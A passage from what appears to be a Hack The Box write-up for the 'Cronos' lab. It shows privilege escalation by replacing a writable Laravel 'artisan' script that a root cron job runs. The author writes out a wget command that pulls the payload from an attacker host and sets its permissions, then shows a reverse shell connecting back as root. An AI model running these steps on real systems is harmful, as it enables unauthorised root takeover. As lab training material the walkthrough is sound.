Hijacking
I discovered there is a system level cronjob executing a PHP script every minute. The current user has a complete control over the script.
www-data@cronos:/var/www/laravel$ mv artisan artisan.bakI will first re-name the script
www-data@cronos:/var/www/laravel$ wget http://10.10.14.5:8000/artisan ; chmod 777 artisan
--2023-01-16 20:49:52-- http://10.10.14.5:8000/artisan
connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 1502 (1.5K) [application/octet-stream]
saving to: 'artisan'
artisan 100%[===================>] 1.47K --.-KB/s in 0s
2023-01-16 20:49:52 (179 MB/s) - 'artisan' saved [1502/1502]Deliver the payload-embedded replacement and change the permission bits
┌──(kali㉿kali)-[~/archive/htb/labs/cronos]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.13] 60726
whoami
root
hostname
cronos
ifconfig
ens160 link encap:Ethernet HWaddr 00:50:56:b9:a9:90
inet addr:10.10.10.13 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:a990/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:a990/64 Scope:Link
up broadcast running multicast mtu:1500 Metric:1
rx packets:2857420 errors:0 dropped:0 overruns:0 frame:0
tx packets:2849592 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:535338995 (535.3 MB) TX bytes:1378915482 (1.3 GB)
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
up loopback running mtu:65536 Metric:1
rx packets:2086 errors:0 dropped:0 overruns:0 frame:0
tx packets:2086 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
rx bytes:202065 (202.0 KB) TX bytes:202065 (202.0 KB)System Level Compromise